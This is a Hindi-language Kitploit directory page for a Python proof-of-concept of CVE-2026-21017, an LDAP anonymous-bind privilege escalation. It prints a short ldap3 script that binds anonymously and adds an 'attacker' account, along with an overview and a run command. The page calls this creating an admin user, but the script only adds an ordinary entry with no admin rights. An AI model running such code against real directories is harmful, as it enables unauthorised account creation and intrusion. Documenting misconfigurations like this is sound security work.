Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation — LDAP अनाम बाइंड विशेषाधिकार वृद्धि के लिए Python proof-of-concept, जो असुरक्षित ACLs का अनुकरण करके अप्रमाणित LDAP बाइंड्स के माध्यम से एडमिन उपयोगकर्ता बनाता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubgeorge0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation

CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation

LDAP अनाम बाइंड विशेषाधिकार वृद्धि के लिए Python proof-of-concept, जो असुरक्षित ACLs का अनुकरण करके अप्रमाणित LDAP बाइंड्स के माध्यम से एडमिन उपयोगकर्ता बनाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
17 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-21017 – LDAP अनाम बाइंड विशेषाधिकार वृद्धि

प्रोग्राम कोड (Python ldap3 सिम)

root@kitploit:~
# ldap_anon_sim.py - LDAP server allowing anonymous bind with write access
from ldap3 import Server, Connection, ALL

# Simulated: real server would be misconfigured
server = Server('ldap://localhost:389', get_info=ALL)
conn = Connection(server, authentication='ANONYMOUS')
conn.bind()
# If anonymous has write permission to userPassword, can add self as admin
conn.add('uid=attacker,ou=people,dc=example,dc=com', ['inetOrgPerson'], {'uid': 'attacker', 'userPassword': 'password'})
print("User created anonymously!")

CVE-2026-21017 – LDAP अनाम बाइंड विशेषाधिकार वृद्धि

Severity: Critical

अवलोकन

एक LDAP निर्देशिका गलत कॉन्फ़िगर की गई है जो अनाम बाइंड्स की अनुमति देती है और साथ ही संवेदनशील विशेषताओं (जैसे userPassword) को लिखने की पहुँच प्रदान करती है। एक हमलावर अनाम रूप से बाइंड कर सकता है और एक नया व्यवस्थापक उपयोगकर्ता बना सकता है, जिससे विशेषाधिकार बढ़ जाते हैं।

भेद्यता विवरण

  • प्रकार: अपर्याप्त एक्सेस नियंत्रण
  • प्रभाव: पूर्ण निर्देशिका समझौता।
  • मूल कारण: एक्सेस कंट्रोल सूची (ACL) लेखन को केवल प्रमाणित उपयोगकर्ताओं तक सीमित नहीं करती है।

शोषण प्रदर्शन

सिमुलेशन चलाएँ (वास्तविक परीक्षण के लिए एक वास्तविक LDAP सर्वर की आवश्यकता होती है, लेकिन हम अवधारणा दिखाते हैं):

root@kitploit:~
python ldap_anon_sim.py

स्क्रिप्ट अनाम रूप से एक उपयोगकर्ता जोड़ने का प्रयास करती है।

टूल डाउनलोड करें